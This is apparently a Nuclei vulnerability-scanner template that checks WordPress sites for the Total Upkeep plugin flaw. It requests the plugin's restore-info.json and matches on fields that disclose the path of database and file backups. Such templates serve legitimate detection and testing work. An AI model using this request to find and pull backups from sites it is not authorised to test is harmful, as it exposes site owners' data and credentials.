id: wordpress-total-upkeep-backup-download

info:
  name: WordPress Total Upkeep Database and Files Backup Download
  author: princechaddha
  severity: high
  reference: https://www.exploit-db.com/exploits/49252
  tags: wordpress,wp-plugin

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '"filepath"'
          - '/wp-content/boldgrid_backup_'
        condition: and
        part: body

      - type: status
        status:
          - 200